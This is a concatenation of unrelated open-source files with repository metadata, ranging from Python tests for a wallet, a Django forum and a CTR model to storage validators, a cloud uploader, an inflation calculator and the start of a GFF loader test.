storage_options = ['netapp', 'ceph-rbd', 'threepar']
netapp_properties = [name + '.storage.chapuser', name + '.storage.ncpaths', name + '.storage.scpaths',
name + '.storage.sanhost', name + '.storage.sanpassword', name +
'.storage.sanuser', name + '.storage.vservername']
ceph_properties = [name + '.storage.cephconfigfile', name + '.storage.cephkeyringfile',
name + '.storage.cephsnapshotpools', name + '.storage.cephuser',
name + '.storage.cephvolumepools']
threepar_properties = [name + '.storage.chapuser', name + '.storage.ncpaths', name + '.storage.sanhost',
name + '.storage.sanuser', name + '.storage.sanpassword', name +
'.storage.scpaths', name + '.storage.threeparwsport', name + '.storage.usercpg',
name + '.storage.copycpg']
for val1 in storage_options:
if val1 in self.topology['clusters'][name]['storage-backend']:
if val1 == "netapp":
storage_properties = netapp_properties
if val1 == "ceph-rbd":
storage_properties = ceph_properties
if val1 == "threepar":
storage_properties = threepar_properties
for val2 in storage_properties:
try:
assert val2 in self.systemproperties
self.success(val1 + ' system property ' + val2 + ' is present.')
except AssertionError, e:
self.failure(val1 + ' system property ' + val2 + ' is missing or invalid! ' + str(e))
|
{
"content_hash": "87361780abc0840a739ce71b674e3beb",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 120,
"avg_line_length": 73.20588235294117,
"alnum_prop": 0.5162715950180795,
"repo_name": "nephomaniac/calyptos",
"id": "1c8bba32300d722d190015a77d7c9ecb2549bf5d",
"size": "2489",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "calyptos/plugins/validator/storage.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "67650"
}
],
"symlink_target": ""
}
|
from ex_fifo36 import convert
def test_fifo36_conversion():
convert()
|
{
"content_hash": "f3ce5854058012fd16085a620d7248ea",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 29,
"avg_line_length": 12.833333333333334,
"alnum_prop": 0.7142857142857143,
"repo_name": "NickShaffner/rhea",
"id": "ca235f946f2638f8d2eb30f4e53e61f9b96b747b",
"size": "79",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "examples/cores/fifo36/test_fifo36.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "2185"
},
{
"name": "Python",
"bytes": "671881"
},
{
"name": "Shell",
"bytes": "1590"
},
{
"name": "VHDL",
"bytes": "10452"
},
{
"name": "Verilog",
"bytes": "22193"
}
],
"symlink_target": ""
}
|
from django.conf.urls import url
from . import views
app_name = 'base'
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^problems/$', views.problem_report, name='problem')
]
|
{
"content_hash": "5b4fb33d8c12e81237a80c37fd38b3c5",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 61,
"avg_line_length": 21.77777777777778,
"alnum_prop": 0.6530612244897959,
"repo_name": "bit-bots/imagetagger",
"id": "a463903d4b4ac530a4ef00524cdddaf1a78b872a",
"size": "196",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/imagetagger/base/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "12288"
},
{
"name": "Dockerfile",
"bytes": "2049"
},
{
"name": "HTML",
"bytes": "273837"
},
{
"name": "JavaScript",
"bytes": "234939"
},
{
"name": "Python",
"bytes": "252248"
},
{
"name": "Shell",
"bytes": "299"
}
],
"symlink_target": ""
}
|
import sys
def solveGomoku(size, grid, findAll=False):
"""Find the winning player from a gomoku game state.
If findAll is True, try to find all winning sets of 5 pawns."""
# Function to read the grid
def getPawn(row, col):
if (row < 0) or (row >= size) or (col < 0) or (col >= size):
return 0
else:
return grid[row][col]
# Possible directions for alignment
directions = [(-1, 1), (0, 1), (1, 1), (1, 0)]
# (Inefficient) scan of all possibilities
allAligns = []
for row in range(size):
for col in range(size):
# We look for the current pawn, and check if there are 4 from the
# same player aligned in any direction
player = grid[row][col]
if True: # XXX wrong here
for (deltaRow, deltaCol) in directions:
curRow = row
curCol = col
for i in range(4):
curRow += deltaRow
curCol += deltaCol
if getPawn(curRow, curCol) != player:
# We got a pawn from the other player (or no pawn)
break
else:
# We didn't 'break', so we got 5 aligned pawns
if findAll:
allAligns.append((row, col, player))
else:
return player
if findAll:
return allAligns
else:
# No 5 pawns aligned found, return 0
return 0
if __name__ == '__main__':
# Read input
size = int(sys.stdin.readline().strip())
grid = [list(map(int, sys.stdin.readline().split())) for i in range(size)]
# Search for the winning player
print solveGomoku(size, grid)
|
{
"content_hash": "36f7f19e2210f13634e3a104e15b4038",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 78,
"avg_line_length": 34.25925925925926,
"alnum_prop": 0.49405405405405406,
"repo_name": "France-ioi/taskgrader",
"id": "ef05103f81fc23174236ed70866e268794b5c3aa",
"size": "2068",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/taskTestchecker/tests/gen/sol_wrong1.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "1753"
},
{
"name": "C++",
"bytes": "2997"
},
{
"name": "Java",
"bytes": "266"
},
{
"name": "JavaScript",
"bytes": "196"
},
{
"name": "OCaml",
"bytes": "1310"
},
{
"name": "PHP",
"bytes": "94"
},
{
"name": "Pascal",
"bytes": "147"
},
{
"name": "Python",
"bytes": "284222"
},
{
"name": "Shell",
"bytes": "10107"
}
],
"symlink_target": ""
}
|
"""Test createwallet watchonly arguments.
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error
)
class CreateWalletWatchonlyTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = False
self.num_nodes = 1
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
node = self.nodes[0]
self.nodes[0].createwallet(wallet_name='default')
def_wallet = node.get_wallet_rpc('default')
a1 = def_wallet.getnewaddress()
wo_change = def_wallet.getnewaddress()
wo_addr = def_wallet.getnewaddress()
self.nodes[0].createwallet(wallet_name='wo', disable_private_keys=True)
wo_wallet = node.get_wallet_rpc('wo')
wo_wallet.importpubkey(pubkey=def_wallet.getaddressinfo(wo_addr)['pubkey'])
wo_wallet.importpubkey(pubkey=def_wallet.getaddressinfo(wo_change)['pubkey'])
# generate some btc for testing
node.generatetoaddress(101, a1)
# send 1 btc to our watch-only address
txid = def_wallet.sendtoaddress(wo_addr, 1)
self.nodes[0].generate(1)
# getbalance
self.log.info('include_watchonly should default to true for watch-only wallets')
self.log.info('Testing getbalance watch-only defaults')
assert_equal(wo_wallet.getbalance(), 1)
assert_equal(len(wo_wallet.listtransactions()), 1)
assert_equal(wo_wallet.getbalance(include_watchonly=False), 0)
self.log.info('Test sending from a watch-only wallet raises RPC error')
msg = "Error: Private keys are disabled for this wallet"
assert_raises_rpc_error(-4, msg, wo_wallet.sendtoaddress, a1, 0.1)
assert_raises_rpc_error(-4, msg, wo_wallet.sendmany, amounts={a1: 0.1})
self.log.info('Testing listreceivedbyaddress watch-only defaults')
result = wo_wallet.listreceivedbyaddress()
assert_equal(len(result), 1)
assert_equal(result[0]["involvesWatchonly"], True)
result = wo_wallet.listreceivedbyaddress(include_watchonly=False)
assert_equal(len(result), 0)
self.log.info('Testing listreceivedbylabel watch-only defaults')
result = wo_wallet.listreceivedbylabel()
assert_equal(len(result), 1)
assert_equal(result[0]["involvesWatchonly"], True)
result = wo_wallet.listreceivedbylabel(include_watchonly=False)
assert_equal(len(result), 0)
self.log.info('Testing listtransactions watch-only defaults')
result = wo_wallet.listtransactions()
assert_equal(len(result), 1)
assert_equal(result[0]["involvesWatchonly"], True)
result = wo_wallet.listtransactions(include_watchonly=False)
assert_equal(len(result), 0)
self.log.info('Testing listsinceblock watch-only defaults')
result = wo_wallet.listsinceblock()
assert_equal(len(result["transactions"]), 1)
assert_equal(result["transactions"][0]["involvesWatchonly"], True)
result = wo_wallet.listsinceblock(include_watchonly=False)
assert_equal(len(result["transactions"]), 0)
self.log.info('Testing gettransaction watch-only defaults')
result = wo_wallet.gettransaction(txid)
assert_equal(result["details"][0]["involvesWatchonly"], True)
result = wo_wallet.gettransaction(txid=txid, include_watchonly=False)
assert_equal(len(result["details"]), 0)
self.log.info('Testing walletcreatefundedpsbt watch-only defaults')
inputs = []
outputs = [{a1: 0.5}]
options = {'changeAddress': wo_change}
no_wo_options = {'changeAddress': wo_change, 'includeWatching': False}
result = wo_wallet.walletcreatefundedpsbt(inputs=inputs, outputs=outputs, options=options)
assert_equal("psbt" in result, True)
assert_raises_rpc_error(-4, "Insufficient funds", wo_wallet.walletcreatefundedpsbt, inputs, outputs, 0, no_wo_options)
self.log.info('Testing fundrawtransaction watch-only defaults')
rawtx = wo_wallet.createrawtransaction(inputs=inputs, outputs=outputs)
result = wo_wallet.fundrawtransaction(hexstring=rawtx, options=options)
assert_equal("hex" in result, True)
assert_raises_rpc_error(-4, "Insufficient funds", wo_wallet.fundrawtransaction, rawtx, no_wo_options)
if __name__ == '__main__':
CreateWalletWatchonlyTest().main()
|
{
"content_hash": "0ab22c65984ed9365102f80066ec7657",
"timestamp": "",
"source": "github",
"line_count": 107,
"max_line_length": 126,
"avg_line_length": 42.271028037383175,
"alnum_prop": 0.6734468273269953,
"repo_name": "litecoin-project/litecoin",
"id": "2bf7c094e56f93591268a182434407a5dedf040a",
"size": "4737",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/functional/wallet_watchonly.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "898000"
},
{
"name": "C",
"bytes": "1594708"
},
{
"name": "C++",
"bytes": "8860047"
},
{
"name": "CMake",
"bytes": "29310"
},
{
"name": "HTML",
"bytes": "21833"
},
{
"name": "Java",
"bytes": "30291"
},
{
"name": "M4",
"bytes": "226003"
},
{
"name": "Makefile",
"bytes": "123607"
},
{
"name": "Objective-C++",
"bytes": "5489"
},
{
"name": "Python",
"bytes": "2267056"
},
{
"name": "QMake",
"bytes": "798"
},
{
"name": "Sage",
"bytes": "31382"
},
{
"name": "Scheme",
"bytes": "7554"
},
{
"name": "Shell",
"bytes": "150309"
}
],
"symlink_target": ""
}
|
class computed_property(object):
def __init__(self, get_func):
self.get_func = get_func
def __get__(self, instance, owner):
if instance is None:
return self
return self.get_func(instance)
|
{
"content_hash": "2b373257e1cdec7ae4a45d0922586fda",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 37,
"avg_line_length": 26.375,
"alnum_prop": 0.6492890995260664,
"repo_name": "uskudnik/ggrc-core",
"id": "2f723ffc520c20e13995cc97d5abd8454f159e2c",
"size": "451",
"binary": false,
"copies": "7",
"ref": "refs/heads/develop",
"path": "src/ggrc/models/computed_property.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "232153"
},
{
"name": "Cucumber",
"bytes": "140526"
},
{
"name": "HTML",
"bytes": "6048248"
},
{
"name": "JavaScript",
"bytes": "1878527"
},
{
"name": "Makefile",
"bytes": "5524"
},
{
"name": "Mako",
"bytes": "1720"
},
{
"name": "Python",
"bytes": "1532862"
},
{
"name": "Ruby",
"bytes": "1496"
},
{
"name": "Shell",
"bytes": "11509"
}
],
"symlink_target": ""
}
|
import pytest
from machina.core.db.models import get_model
from machina.test.factories import (
PostFactory, UserFactory, create_category_forum, create_forum, create_link_forum, create_topic
)
Post = get_model('forum_conversation', 'Post')
Topic = get_model('forum_conversation', 'Topic')
@pytest.mark.django_db
class TestApprovedManager(object):
@pytest.fixture(autouse=True)
def setup(self):
self.u1 = UserFactory.create()
# Set up a top-level category
self.top_level_cat = create_category_forum()
# Set up some forums
self.forum_1 = create_forum(parent=self.top_level_cat)
self.forum_2 = create_forum(parent=self.top_level_cat)
self.forum_3 = create_link_forum(parent=self.top_level_cat)
# Set up a top-level forum link
self.top_level_link = create_link_forum()
# Set up some topics
self.forum_1_topic = create_topic(forum=self.forum_1, poster=self.u1)
self.forum_3_topic = create_topic(forum=self.forum_3, poster=self.u1)
self.forum_3_topic_2 = create_topic(forum=self.forum_3, poster=self.u1, approved=False)
# Set up some posts
self.post_1 = PostFactory.create(topic=self.forum_1_topic, poster=self.u1)
self.post_2 = PostFactory.create(topic=self.forum_3_topic, poster=self.u1)
self.post_3 = PostFactory.create(topic=self.forum_3_topic, poster=self.u1, approved=False)
def test_can_help_return_approved_topics(self):
# Run
topics = Topic.approved_objects.all()
# Check
assert set(topics) == set([self.forum_3_topic, self.forum_1_topic, ])
def test_can_help_return_approved_posts(self):
# Run
posts = Post.approved_objects.all()
# Check
assert set(posts) == set([self.post_1, self.post_2, ])
|
{
"content_hash": "64d109ff0326419fc415342b40bf0778",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 98,
"avg_line_length": 36.58,
"alnum_prop": 0.6593767085839256,
"repo_name": "ellmetha/django-machina",
"id": "ea5dd4f2141837a283dde0a43908b86559998750",
"size": "1829",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tests/unit/apps/forum_conversation/test_managers.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "455"
},
{
"name": "HTML",
"bytes": "129594"
},
{
"name": "JavaScript",
"bytes": "6073"
},
{
"name": "Makefile",
"bytes": "3783"
},
{
"name": "Python",
"bytes": "743877"
},
{
"name": "SCSS",
"bytes": "8981"
}
],
"symlink_target": ""
}
|
"""Workflow_Event TQL Filter"""
# standard library
from enum import Enum
# first-party
from tcex.api.tc.v3.api_endpoints import ApiEndpoints
from tcex.api.tc.v3.filter_abc import FilterABC
from tcex.api.tc.v3.tql.tql_type import TqlType
class WorkflowEventFilter(FilterABC):
"""Filter Object for WorkflowEvents"""
@property
def _api_endpoint(self) -> str:
"""Return the API endpoint."""
return ApiEndpoints.WORKFLOW_EVENTS.value
def case_id(self, operator: Enum, case_id: int):
"""Filter Case ID based on **caseId** keyword.
Args:
operator: The operator enum for the filter.
case_id: The ID of the case this event is associated with.
"""
self._tql.add_filter('caseId', operator, case_id, TqlType.INTEGER)
def date_added(self, operator: Enum, date_added: str):
"""Filter Date Added based on **dateAdded** keyword.
Args:
operator: The operator enum for the filter.
date_added: The date the event was added.
"""
date_added = self.utils.any_to_datetime(date_added).strftime('%Y-%m-%d %H:%M:%S')
self._tql.add_filter('dateAdded', operator, date_added, TqlType.STRING)
def deleted(self, operator: Enum, deleted: bool):
"""Filter Deleted based on **deleted** keyword.
Args:
operator: The operator enum for the filter.
deleted: The deletion status of the event.
"""
self._tql.add_filter('deleted', operator, deleted, TqlType.BOOLEAN)
def deleted_reason(self, operator: Enum, deleted_reason: str):
"""Filter Deleted Reason based on **deletedReason** keyword.
Args:
operator: The operator enum for the filter.
deleted_reason: The reason the event was deleted.
"""
self._tql.add_filter('deletedReason', operator, deleted_reason, TqlType.STRING)
def event_date(self, operator: Enum, event_date: str):
"""Filter Event Date based on **eventDate** keyword.
Args:
operator: The operator enum for the filter.
event_date: The date the event occurred.
"""
event_date = self.utils.any_to_datetime(event_date).strftime('%Y-%m-%d %H:%M:%S')
self._tql.add_filter('eventDate', operator, event_date, TqlType.STRING)
def id(self, operator: Enum, id: int): # pylint: disable=redefined-builtin
"""Filter ID based on **id** keyword.
Args:
operator: The operator enum for the filter.
id: The ID of the event.
"""
self._tql.add_filter('id', operator, id, TqlType.INTEGER)
def link(self, operator: Enum, link: str):
"""Filter Link based on **link** keyword.
Args:
operator: The operator enum for the filter.
link: The item this event pertains to, in format <type>:<id>.
"""
self._tql.add_filter('link', operator, link, TqlType.STRING)
def summary(self, operator: Enum, summary: str):
"""Filter Summary based on **summary** keyword.
Args:
operator: The operator enum for the filter.
summary: Text of the event.
"""
self._tql.add_filter('summary', operator, summary, TqlType.STRING)
def system_generated(self, operator: Enum, system_generated: bool):
"""Filter System Generated based on **systemGenerated** keyword.
Args:
operator: The operator enum for the filter.
system_generated: Flag determining if this event was created automatically by the
system.
"""
self._tql.add_filter('systemGenerated', operator, system_generated, TqlType.BOOLEAN)
def user_name(self, operator: Enum, user_name: str):
"""Filter User Name based on **userName** keyword.
Args:
operator: The operator enum for the filter.
user_name: The username associated with the event.
"""
self._tql.add_filter('userName', operator, user_name, TqlType.STRING)
|
{
"content_hash": "46a1a9e16c9cf6f189fd721c311aafd8",
"timestamp": "",
"source": "github",
"line_count": 110,
"max_line_length": 93,
"avg_line_length": 37.04545454545455,
"alnum_prop": 0.618159509202454,
"repo_name": "ThreatConnect-Inc/tcex",
"id": "6ba4a4a6f8ab767e7728907d1455021621209863",
"size": "4075",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tcex/api/tc/v3/workflow_events/workflow_event_filter.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2735042"
}
],
"symlink_target": ""
}
|
""" Jekyll at Rackspace Cloud Files with Clean URLs """
import os
import cloudfiles
# Rackspace Cloud API credentials
USERNAME = "RACKSPACECLOUD_USERNAME"
API_KEY = "RACKSPACECLOUD_API_KEY"
# The name of your container.
# I create containers in the format: www.domain.com
CONTAINER_NAME = "www.yourdomain.com"
conn = cloudfiles.get_connection(username=USERNAME,
api_key=API_KEY,
serviceNet=False)
container = conn.get_container(CONTAINER_NAME)
# Upload all files in the jekyll _site directory
for root, dirs, files in os.walk('_site'):
for name in files:
filename = os.path.join(root, name)
# Remove _site/ from the uploaded file name,
# or else our URL will be www.domain.com/_site/post-name
upload_filename = filename.replace("_site/", "")
# Upload the file to Rackspace Cloud Files
obj = container.create_object(upload_filename)
# Check if the file contains HTML code.
# If so, we need to set the correct content type.
for line in open(filename):
if "<!DOCTYPE html>" in line:
print "file %s is an HTML file!" % filename
# If html file, then set content type
obj.content_type = "text/html"
fp = open(filename)
print "uploading filename: %s" % upload_filename
obj.write(fp)
|
{
"content_hash": "5ecf2d12c01c79ea410d62bd5db1893a",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 64,
"avg_line_length": 34.41463414634146,
"alnum_prop": 0.6236711552090716,
"repo_name": "nicholaskuechler/jekyll-rackspace-cloudfiles-clean-urls",
"id": "e7e6bda6d823234e55eb31f292bdfad584f36c46",
"size": "1534",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cloudfiles_jekyll_upload.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1534"
},
{
"name": "Ruby",
"bytes": "643"
}
],
"symlink_target": ""
}
|
import pytest
from deepctr.models import DeepFM
from ..utils import check_model, get_test_data, SAMPLE_SIZE, get_test_data_estimator, check_estimator, TEST_Estimator
@pytest.mark.parametrize(
'hidden_size,sparse_feature_num',
[((2,), 1), #
((3,), 2)
] # (True, (32,), 3), (False, (32,), 1)
)
def test_DeepFM(hidden_size, sparse_feature_num):
model_name = "DeepFM"
sample_size = SAMPLE_SIZE
x, y, feature_columns = get_test_data(sample_size, sparse_feature_num=sparse_feature_num,
dense_feature_num=sparse_feature_num)
model = DeepFM(feature_columns, feature_columns, dnn_hidden_units=hidden_size, dnn_dropout=0.5)
check_model(model, model_name, x, y)
@pytest.mark.parametrize(
'hidden_size,sparse_feature_num',
[
((3,), 2)
] # (True, (32,), 3), (False, (32,), 1)
)
def test_DeepFMEstimator(hidden_size, sparse_feature_num):
if not TEST_Estimator:
return
from deepctr.estimator import DeepFMEstimator
sample_size = SAMPLE_SIZE
linear_feature_columns, dnn_feature_columns, input_fn = get_test_data_estimator(sample_size,
sparse_feature_num=sparse_feature_num,
dense_feature_num=sparse_feature_num,
classification=False)
model = DeepFMEstimator(linear_feature_columns, dnn_feature_columns, dnn_hidden_units=hidden_size, dnn_dropout=0.5,
task="regression")
check_estimator(model, input_fn)
if __name__ == "__main__":
pass
|
{
"content_hash": "3613b76a3a00715ae3d9078fad7b6d6e",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 122,
"avg_line_length": 37.191489361702125,
"alnum_prop": 0.5577803203661327,
"repo_name": "shenweichen/DeepCTR",
"id": "b466fbc8182147d1752e156d0747c3f0f23571cb",
"size": "1748",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/models/DeepFM_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "511770"
}
],
"symlink_target": ""
}
|
"""This example gets all ad groups for a given campaign.
To add an ad group, run add_ad_group.py.
The LoadFromStorage method is pulling credentials and properties from a
"googleads.yaml" file. By default, it looks for this file in your home
directory. For more information, see the "Caching authentication information"
section of our README.
"""
from googleads import adwords
PAGE_SIZE = 500
CAMPAIGN_ID = 'INSERT_CAMPAIGN_ID_HERE'
def main(client, campaign_id):
# Initialize appropriate service.
ad_group_service = client.GetService('AdGroupService', version='v201502')
# Construct selector and get all ad groups.
offset = 0
selector = {
'fields': ['Id', 'Name', 'Status'],
'predicates': [
{
'field': 'CampaignId',
'operator': 'EQUALS',
'values': [campaign_id]
}
],
'paging': {
'startIndex': str(offset),
'numberResults': str(PAGE_SIZE)
}
}
more_pages = True
while more_pages:
page = ad_group_service.get(selector)
# Display results.
if 'entries' in page:
for ad_group in page['entries']:
print ('Ad group with name \'%s\', id \'%s\' and status \'%s\' was '
'found.' % (ad_group['name'], ad_group['id'],
ad_group['status']))
else:
print 'No ad groups were found.'
offset += PAGE_SIZE
selector['paging']['startIndex'] = str(offset)
more_pages = offset < int(page['totalNumEntries'])
if __name__ == '__main__':
# Initialize client object.
adwords_client = adwords.AdWordsClient.LoadFromStorage()
main(adwords_client, CAMPAIGN_ID)
|
{
"content_hash": "aae882dd7d28b15cb25167c28fa76b17",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 77,
"avg_line_length": 27.327868852459016,
"alnum_prop": 0.611877624475105,
"repo_name": "losnikitos/googleads-python-lib",
"id": "c295768f54e2c1f614aff5974409cfaa90e9f9f6",
"size": "2285",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "examples/adwords/v201502/basic_operations/get_ad_groups.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "168602"
}
],
"symlink_target": ""
}
|
from __future__ import division
import csv
def load_inflation_data(filename='usinf.csv'):
with open(filename, 'rb') as inflation:
reader = csv.reader(inflation)
reader.next() #ignore first line
data = {int(row[0]): float(row[1]) for row in reader}
return data
def calculate_inflation(principle, start_year, end_year, inflation_data_file='usinf.csv'):
data = load_inflation_data(inflation_data_file)
if start_year >= end_year:
raise ValueError('Start year must be before end year')
if start_year < min(data.keys()):
raise ValueError('Start year must be greater than or equal to %s'%min(data.keys()))
if end_year > max(data.keys()):
raise ValueError('End year must be greater than or equal to %s'%max(data.keys()))
amount = principle
for year in xrange(start_year, end_year+1):
amount += data[year]/100 * amount
return amount
def get_user_input():
start_year = int(raw_input('Enter a start year: '))
end_year = int(raw_input('Enter a end year: '))
principle = float(raw_input('Enter a starting amount: '))
print principle, 'USD in', start_year, 'is equal to', calculate_inflation(principle, start_year, end_year), 'in', end_year
if __name__ == '__main__':
get_user_input()
|
{
"content_hash": "01b9fc08683fafa842ac94c3a520eebf",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 126,
"avg_line_length": 35.24324324324324,
"alnum_prop": 0.6449386503067485,
"repo_name": "cgkanchi/usinflation",
"id": "739de87fbf0f2df5a4fe27e7794028648342de40",
"size": "1304",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "usinflation.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1304"
}
],
"symlink_target": ""
}
|
from nose.tools import raises
from . import ChadoTestCase, ci
class GFFTest(ChadoTestCase):
def _del_dbxref(self):
self.ci.session.query(self.ci.model.dbxref).filter(
self.ci.model.dbxref.db_id == 1,
(self.ci.model.dbxref.accession.like('VNBP%') | self.ci.model.dbxref.accession.like('%VIRU'))
).delete(synchronize_session='fetch')
def test_load_gff(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
gene_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="orange1.1g015632m.g") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
geneterm = self.ci.get_cvterm_id('gene', 'sequence')
# Check gene feature
assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.residues is None, "gff>gene loaded correctly"
assert gene_f.seqlen is None, "gff>gene loaded correctly"
assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
assert gene_f.is_analysis is False, "gff>gene loaded correctly"
assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
# Check gene loc
assert len(gene_f.featureloc_collection) == 1, "gff>pep located correctly"
assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
src_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=gene_f.featureloc_collection[0].srcfeature_id) \
.one()
assert src_f.uniquename == "scaffold00001", "gff>gene loaded correctly"
scaff1_id = src_f.feature_id
# Check gene aliases
exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
syns = {synf.synonym.name: synf.synonym.type_id for synf in gene_f.feature_synonym_collection}
assert len(syns) == 2, "gff>gene aliases loaded correctly"
assert 'some-synonym' in syns, "gff>gene aliases loaded correctly"
assert 'another synonym' in syns, "gff>gene aliases loaded correctly"
assert syns['some-synonym'] == exactterm, "gff>gene aliases loaded correctly"
assert syns['another synonym'] == exactterm, "gff>gene aliases loaded correctly"
# Check gene dbxref
dbs = self.ci.session.query(self.ci.model.db.db_id, self.ci.model.db.name, self.ci.model.db.description) \
.filter((self.ci.model.db.name == 'GO') | (self.ci.model.db.name == 'FOOBAR') | (self.ci.model.db.name == 'FOOBARXX') | (self.ci.model.db.name == 'GFF_source'))
for db in dbs:
if db.name == "FOOBAR":
assert db.description == "Added automatically by the GFF loader", "gff>gene dbxrefs db loaded correctly"
dbs = {db.name: db.db_id for db in dbs}
assert len(dbs) == 4, "gff>gene dbxrefs db loaded correctly"
xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in gene_f.feature_dbxref_collection}
assert len(xrefs) == 3, "gff>gene dbxrefs loaded correctly"
assert '0061611' in xrefs, "gff>gene dbxrefs loaded correctly"
assert '6528B' in xrefs, "gff>gene dbxrefs loaded correctly"
assert 'phytozome6' in xrefs, "gff>gene dbxrefs loaded correctly"
assert xrefs['0061611'] == dbs['GO'], "gff>gene dbxrefs loaded correctly"
assert xrefs['6528B'] == dbs['FOOBAR'], "gff>gene dbxrefs loaded correctly"
assert xrefs['phytozome6'] == dbs['GFF_source'], "gff>gene dbxrefs loaded correctly"
# Check gene featureprop
expected = [
'Gap___BLABLA___0',
'Gap___BLOBLO___1',
'Note___that\'s fantastic___0',
'Note___really___1',
'Poutrelle___test___1',
'Poutrelle___lapinou___0',
]
assert len(gene_f.featureprop_collection) == 6, "gff>gene loaded correctly"
for prop in gene_f.featureprop_collection:
assert prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank) in expected, "gff>gene loaded correctly"
expected.remove(prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank))
# Check mrna
rna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136219") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
rnaterm = self.ci.get_cvterm_id('mRNA', 'sequence')
# Check mRNA feature
assert rna_f.dbxref_id is None, "gff>mRNA loaded correctly"
assert rna_f.organism_id == org['organism_id'], "gff>mRNA loaded correctly"
assert rna_f.name == "orange1.1g015615m", "gff>mRNA loaded correctly"
assert rna_f.uniquename == "PAC:18136219", "gff>mRNA loaded correctly"
assert rna_f.residues is None, "gff>mRNA loaded correctly"
assert rna_f.seqlen is None, "gff>mRNA loaded correctly"
assert rna_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>mRNA loaded correctly"
assert rna_f.type_id == rnaterm, "gff>mRNA loaded correctly"
assert rna_f.is_analysis is False, "gff>mRNA loaded correctly"
assert rna_f.is_obsolete is False, "gff>mRNA loaded correctly"
# Check mRNA loc
assert len(rna_f.featureloc_collection) == 1, "gff>pep located correctly"
